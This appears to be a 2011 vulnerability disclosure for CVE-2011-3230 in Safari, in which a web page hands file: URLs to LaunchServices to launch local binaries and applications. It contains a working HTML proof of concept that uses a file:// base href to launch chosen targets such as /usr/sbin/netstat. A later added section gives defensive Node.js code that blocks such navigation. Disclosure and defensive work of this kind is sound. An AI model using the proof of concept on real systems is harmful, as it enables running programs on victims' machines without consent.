Apple Safari Arbitrary Code Execution
Posted on 15 October 2011
CVE: CVE-2011-3230
Found By: Aaron Sigel of vtty.com

There's not a ton to say about this bug aside from "Yikes"! I think the PoC speaks for itself. A web page can hand any "file:" URL to LaunchServices, which will run binaries, launch applications, or open content in its default application. The only caveat is that LaunchServices checks the quarantine bit, so you cannot push a binary to the browser and launch it directly. Other than that, you can run or launch anything you can already access on disk using the method in the HTML below.

```html
<html>
<head>
  <!-- A file: base makes every relative path below resolve to a file: URL -->
  <base href="file://">
  <script>
    function DoIt() {
      // Show the selected path, then navigate to it; Safari hands the
      // resulting file: URL to LaunchServices
      alert(document.getElementById("cmdToRun").value);
      document.location = document.getElementById("cmdToRun").value;
    }
  </script>
</head>
<body>
  <select id="cmdToRun">
    <option value="/usr/sbin/netstat">Launch /usr/sbin/netstat</option>
    <option value="/etc/passwd">Launch /etc/passwd</option>
    <option value="/Applications/Utilities/Bluetooth File Exchange.app">Launch Bluetooth File Exchange.app</option>
  </select>
  <br />
  <input type="button" value="Launch" onclick="DoIt()">
  <br />
</body>
</html>
```

Apple's advisory: http://support.apple.com/kb/HT5000
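The check Safari should have applied to this navigation, as an added example (not from the original post and not Apple's fix): it resolves the target the same way the PoC relies on, against the page's `<base href>`, and refuses a `file:` result when the document itself was loaded over http or https. It runs under Node.js (the WHATWG `URL` class is global); the origin and paths are constructed samples.

```javascript
// Added example, not part of the original advisory or Apple's fix. Runs under
// Node.js (the WHATWG URL class is global). Origins and paths are constructed.
const NETWORK_SCHEMES = new Set(["http:", "https:"]);

// Resolve a navigation target the same way the PoC relies on:
// "/usr/sbin/netstat" with <base href="file://"> becomes file:///usr/sbin/netstat
function resolveNavigation(target, baseHref) {
  try {
    return new URL(target, baseHref);
  } catch (e) {
    return null; // unparseable target: nothing to navigate to
  }
}

// Decide whether a document served from pageOrigin may follow the navigation.
// The missing rule: a network-origin document must never end up at a file: URL,
// whatever base href it declares. suspiciousBase flags a file: base on a
// network page, which is worth alerting on before any navigation happens.
function checkNavigation(pageOrigin, baseHref, target) {
  let originScheme;
  try {
    originScheme = new URL(pageOrigin).protocol;
  } catch (e) {
    return { allowed: false, reason: "unparseable page origin", href: null, suspiciousBase: false };
  }
  const fromNetwork = NETWORK_SCHEMES.has(originScheme);
  // Browsers resolve <base href> against the document URL, so do the same here
  const base = resolveNavigation(baseHref, pageOrigin);
  const suspiciousBase = fromNetwork && base !== null && base.protocol === "file:";

  const resolved = resolveNavigation(target, base === null ? pageOrigin : base.href);
  if (resolved === null) {
    return { allowed: false, reason: "unparseable target", href: null, suspiciousBase };
  }
  if (fromNetwork && resolved.protocol === "file:") {
    return { allowed: false, reason: "network page may not navigate to a file: URL",
             href: resolved.href, suspiciousBase };
  }
  return { allowed: true, reason: "", href: resolved.href, suspiciousBase };
}

// Sample: the PoC's <base href="file://"> served from a constructed web origin
const PAGE_ORIGIN = "http://web.example/"; // constructed
const POC_BASE = "file://";                // base href from the PoC
const verdict = checkNavigation(PAGE_ORIGIN, POC_BASE, "/usr/sbin/netstat");
console.log(verdict); // allowed: false, suspiciousBase: true
```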
